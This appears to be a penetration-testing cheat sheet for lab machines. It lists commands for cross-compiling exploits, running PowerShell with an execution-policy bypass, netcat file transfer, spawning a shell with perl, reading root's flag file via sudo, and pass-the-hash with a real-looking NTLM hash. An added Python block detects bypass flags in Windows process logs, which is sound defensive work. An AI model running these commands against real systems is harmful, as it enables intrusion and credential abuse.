# MISC

Compiling Exploits

```
gcc -o exploit exploit.c
# Compile C code; add -m32 after 'gcc' to build 32-bit code on 64-bit Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

# Cross compiling: compile a Windows exploit on Linux
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe

# Compile a Python script to a Windows executable
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
```

Packet Inspection

```
tcpdump tcp port 80 -w output.pcap -i eth0
```

Powershell bypass

```
# PowerShell
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
```
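The flag combination above is also what a defender looks for in process-creation logs. The following is an added example, not part of the original cheat sheet: a small classifier for command lines that recognises the switches above, including their abbreviated spellings (-ep, -nop, -noni, -w), and scores the result. The abbreviation table is my assumption based on powershell.exe's prefix matching; the sample log lines are constructed.

```python
# (canonical name, accepted spelling, shortest prefix accepted)
# Assumption: mirrors powershell.exe's prefix matching for these switches.
SWITCHES = [
    ("executionpolicy", "executionpolicy", "ex"),
    ("executionpolicy", "ep", "ep"),
    ("noprofile", "noprofile", "nop"),
    ("noninteractive", "noninteractive", "noni"),
    ("windowstyle", "windowstyle", "w"),
    ("encodedcommand", "encodedcommand", "e"),
]
HOSTS = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}


def canonical_switch(token):
    """Map '-ExecutionPolicy', '/ep', '-NoP', ... to a canonical switch name."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    t = token[1:].lower()
    for name, spelling, shortest in SWITCHES:
        if spelling.startswith(t) and t.startswith(shortest):
            return name
    return None


def analyze(cmdline):
    """Return {'flagged': bool, 'indicators': [...]} for one process command line."""
    tokens = cmdline.split()
    image = tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower() if tokens else ""
    if image not in HOSTS:
        return {"flagged": False, "indicators": []}
    found = set()
    for i, tok in enumerate(tokens[1:], start=1):
        sw = canonical_switch(tok)
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if sw == "executionpolicy" and nxt in {"bypass", "unrestricted"}:
            found.add("executionpolicy_bypass")
        elif sw == "windowstyle" and nxt == "hidden":
            found.add("windowstyle_hidden")
        elif sw in {"noprofile", "noninteractive", "encodedcommand"}:
            found.add(sw)
    # A policy bypass or encoded command is enough on its own; otherwise
    # require two of the quieter "run unattended" switches together.
    flagged = bool(found & {"executionpolicy_bypass", "encodedcommand"}) or len(found) >= 2
    return {"flagged": flagged, "indicators": sorted(found)}


# Constructed sample log lines; the first is the invocation listed above.
SAMPLES = [
    "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1",
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -nop -w hidden -File x.ps1",
    "powershell.exe -NoProfile -Command Get-Process",
    "notepad.exe notes.txt",
]
```

Feed `analyze()` the CommandLine field of Sysmon event 1 or Windows event 4688 records; the single `-NoProfile` line stays unflagged so that ordinary admin scripts do not drown the alert.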

Windows Exploit Suggester

```
./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt
```

Finding Auxiliary

```
ls /usr/share/nmap/scripts/ | grep smb | grep vuln
```

Netcat

```
# File transfer from attacker to target
# At target (listener writes incoming data to a file)
nc -lvp 6969 > blah.txt
# At attacker (method 1)
nc x.x.x.x 6969 < blah.txt
# At attacker (method 2)
cat blah.txt | nc x.x.x.x 6969
```

Perl Exploit

```
# Perl exploit: spawn a shell
perl -e 'exec "/bin/sh";'
# Print the first colon-separated field of each line
sudo perl -F: -lane 'print $F[0]' /root/root.txt
```

Awk

```
# Remove duplicate lines (keeps the first occurrence, preserves order)
awk '!seen[$0]++' file
```

Searchsploit

```
searchsploit --overflow --exact --mirror 21234
searchsploit --overflow --exact Gwolle
```

Firewall Rule Enable

```
# Firewall rule enable
ufw allow from victimip to any port 80,443 proto tcp
```

Wordlist Creation

```
# Wordlist creation
cewl -w cewl-forum.txt -e -a http://forum.bart.htb
```

Pass the Hash

```
# Pass the hash
pth-winexe -U jenkins/administrator //ip cmd.exe
pth-winexe -U jenkins/administrator%password //ip cmd.exe
# crackmapexec also supports pass-the-hash authentication
crackmapexec

# Credential given as LM:NT hash pair
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
```

Share folder Windows to Linux

```
mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other
```
